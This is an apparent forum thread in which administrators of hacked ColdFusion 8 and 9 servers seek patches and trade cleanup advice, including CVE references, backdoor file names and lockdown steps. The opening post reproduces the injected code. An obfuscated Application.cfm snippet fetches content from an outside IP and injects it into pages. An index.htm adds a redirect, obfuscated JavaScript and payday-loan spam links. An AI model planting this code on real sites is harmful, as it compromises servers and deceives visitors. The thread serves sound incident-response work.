• Global community
    • Language:
      • Deutsch
      • English
      • Español
      • Français
      • Português
  • 日本語コミュニティ
    Dedicated community for Japanese speakers
  • 한국 커뮤니티
    Dedicated community for Korean speakers
Exit
0

CF8.01 hacked. Need info on patches

New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

Here's the hack:

  1. Application.cfm

<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

<cfset mmy = cfhttp.FileContent><cfoutput>

#mmy#

</cfoutput>

</cfsavecontent>

<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

<cfset cfs = cfhttp.FileContent>

<cfif (FindNoCase("</div>",paga) GT 0)>

<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

<cfelseif (FindNoCase("</table>",paga) GT 0)>

<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

<cfelseif (FindNoCase("</a>",paga) GT 0)>

<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>

<cfelse>

<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>

</cfif>

<cfoutput>

#paga#

</cfoutput>

<cfabort>

</cfif>

<cffunction name="hSWaawe"> 

<cfargument name="HxzcGlk">

<cfset Ypg = ToString(ToBinary(HxzcGlk))>

<cfreturn Ypg>

</cffunction>

  1. Index.htm

<html>

  <head>

    <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">

  </head>

  <body>

    <br>

    <br>

    <br>

    <br>

    <center>

      <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();

</script>

<p class="zdroq">

Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>

    </center>

  </body>

</html>

Thanks in advance.

--Jeremy

Views

28.7K

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Hi Jeremy

Can you please provide the CVE code?

Regards

Swaraj

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

These are for CF9 and 10.  I've found nothing for CF8 yet.

CVE-2013-0625, CVE-2013-0629, CVE-2013-0631 and CVE-2013-0632

http://www.adobe.com/support/security/bulletins/apsb13-03.html

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Hi Jeremy

Below lines are mentioned in the article:

Note that ColdFusion customers using an unsupported version of ColdFusion (including ColdFusion 8.x and earlier) can protect themselves from CVE-2013-0625, CVE-2013-0629 and CVE-2013-0632 by configuring the following:

  • Setting the password for Remote Development Services (even if RDS is disabled) 
  • Enabling password protection for RDS 
  • Setting the Admin password and enabling password protection for Administrator

Can you please try them?

Regards

Swaraj

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Swaraj, thanks for the quick response.  I'll apply these patches and settings asap.

--Jeremy

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

My company is running CF 9.0 ad we patched our servers last week.  However, we got hacked this weekend as well.  They added that code, plus a javaScript snippet to every index.cfm file on our server (hundres of files). 

RDS is disabled, there is now an RDS password, and the CF Admin has a password.  If anyone has any information on how these hackers got in it would be greatly appreciated.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Guest
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Yes, I would like to know how this all happens as well - this hacking business in CF.  Any clues/?

We are going to install the patch tomorrow when my network guy gets in.  It worries me that sduncanute has installed already and is still having issues. 

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Part of the issue *may* be related to having the cfide/administrator folder exposed to outside users.  Be sure you block remote access to that folder and perhaps also the cfide/adminapi folder (which is where I got hacked).

NOTE: Blocking the /cfide folder may break some CF features, like CFFORM, so leave access for that.

I am not sure this will work, but it may help.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Guest
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

I just had a crazy morning trying to figure out why our site was breaking, posting crazy text, ruining our redirect to mobile site, etc.  Then I found this post and saw the code that I discovered on our site with Firebug that matched exactly what you posted.  We are running CF9, and you say there is a patch?  Where might we find that?

Thanks for your help.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

I had this same problem this morning, and I am running 9.0.1 and already have hf901-00008.jar installed.. which means I have that patch already.  Any other ideas??

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Adobe Employee ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Hi PocoDiablo and sduncanute

Have you had chance to apply this http://www.adobe.com/support/security/bulletins/apsb13-03.html for the same reasons?

Regegards

Swaraj

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Albusteck,

As noted, I have gone through that bulletin and I am running the latest jar file.  I've already done everything on that list.  Now what?  This was patched weeks ago.

Sue

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Hi Swaraj, I did in fact apply that patch to my servers last Monday.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Enthusiast ,
Feb 04, 2013 Feb 04, 2013

Copy link to clipboard

Copied

Those that have already applied the latest patch on CF9/10 but have been hacked, do you have a file /CFIDE/h.cfm /CFIDE/i.cfm or /CFIDE/help.cfm it is possible you had already been hit before applying the patch and still had a backdoor on your server. Note the file could be pretty much anywhere but under /CFIDE somewhere is a likley location.

It is also possible that you have common third party software with a vulnerability that was hit, among many other things. It would be a good idea to review the web server logs around the time of the incident to see if you can uncover anything.

If you find something that appears to be a new exploit you should send it to the Adobe Product Security Incident Response Team rather than posting it here: http://www.adobe.com/support/security/alertus.html

In addition to applying patches you should also follow the ColdFusion Lockdown Guides:

http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-...

http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion-enterprise/pdf/CF1...

Pete Freitag,
HackMyCF.com

Foundeo Inc.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Feb 05, 2013 Feb 05, 2013

Copy link to clipboard

Copied

Pete,

I have contacted Adobe and sent them off a bunch of my files at their request.  I just saw this message and went looking and yes, I had the h.cfm in my CFIDE root directory with a December 25th date. 

I found those lockdown guides not long ago and have gone through all of it for our new server, but didn't for this one. 

Any other files I should be looking for?

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 05, 2013 Feb 05, 2013

Copy link to clipboard

Copied

Pete, my server does indeed have those files - /CFIDE/h.cfm /CFIDE/i.cfm.

They appeared on 1/2/2013, which is significantly after the previously mentioned hotfix released on Jan 15th, 2013:

http://www.adobe.com/support/security/bulletins/apsb13-03.html

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Guest
Feb 05, 2013 Feb 05, 2013

Copy link to clipboard

Copied

So, I have located the h.cfm and i.cfm files.  What are you suggesting to do with these files?

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Enthusiast ,
Feb 06, 2013 Feb 06, 2013

Copy link to clipboard

Copied

If you have the /CFIDE/h.cfm or  /CFIDE/i.cfm files they are not part of ColdFusion, and were placed there by an attacker. So you should delete them! You should probably do a fresh OS, CF install at this point, be sure to use new passwords for everything.

There have been reports of files being added under the /CFIDE/adminapi directory as well in recent attacks, so you will want to look there as well (check file timestamps on all your files in CFIDE), but as I said consider doing a full reinstall.

--

Pete Freitag

HackMyCF.com - ColdFusion Server Security Scanner

FuseGaurd.com - Web Application Firewall for ColdFusion

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Guest
Feb 07, 2013 Feb 07, 2013

Copy link to clipboard

Copied

There is a file called fusebox.cfm with a time stamp date of 2/6/13 in the adminapi/customtags directory. Is this legit?  And if so, what is it?

Also a file called adss.cfm with a 2/3/13 time stamp in the same directory.  This seems to be part of the attack.  Can you verify this to be true? 

Thanks.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Community Beginner ,
Feb 07, 2013 Feb 07, 2013

Copy link to clipboard

Copied

These files are part of the hack.  Make a copy of these and then delete them.  I kept a copy of everything so that I can share the info with Adobe, who are following up with this.

Do a search on your whole server for anything else that has those date stamps that looks wierd.

I zapped my entire website and restored it, and then went through all of the log files, and the whole Cold Fusion installation looking for odd items.

We are moving to a new server as soon as I finish migrating my Access databases to MS SQL, otherwise I would be doing a full re-install.

Sue

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 08, 2013 Feb 08, 2013

Copy link to clipboard

Copied

The h.cfm file was added to my server on 11/17/2012.  This was done by creating a scheduled task, running it, and then deleting the task so I would not see it.  Yes, my /administrator and /adminapi directories were still available.  I realize I've been too lax -- have been using ColdFusion for over a decade with no major security issues, so I didn't pay close attention to locking out these directories to public IP addresses.

The h.cfm file was called several times over December and January, but nothing else was done.

On 2/3 some text was added to several index.cfm pages, but they were not the default pages and therefore the attack didn't take down the server.

I removed h.cfm, i.cfm, fusebox.com and adss.cfm.  I renamed h.cfm, found the password inside it, and tried it.  I was able to see what the attacker could see.  Passwords for data sources, in particular, were available.

After plugging the hole, then removing the files, I would suggest changing all datasource passwords, as the attackers would have gained access to them.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Contributor ,
Feb 08, 2013 Feb 08, 2013

Copy link to clipboard

Copied

Will restricting access to the CFIDE folder prevent this exploit, or is it more involved than that?

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 19, 2013 Feb 19, 2013

Copy link to clipboard

Copied

My server was also hacked with the "payday loans" code appearing on most index.cfm and index.html pages. After deleteing the injected code, it reappeared 3 days later. I believe I have since discovered the real culprit -- a modified application.cfm in the CFIDE directory.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
New Here ,
Feb 20, 2013 Feb 20, 2013

Copy link to clipboard

Copied

EcleticDan - what version of CF were your running, and were you fully patched?  Any suggestions on what we can do to protect ourselves?  I locked out /cfide/administrator so no one can get to it unless you RDC to the server.

Votes

Translate

Translate

Report

Report
Community guidelines
Be kind and respectful, give credit to the original source of content, and search for duplicates before posting. Learn more
community guidelines
Resources
Documentation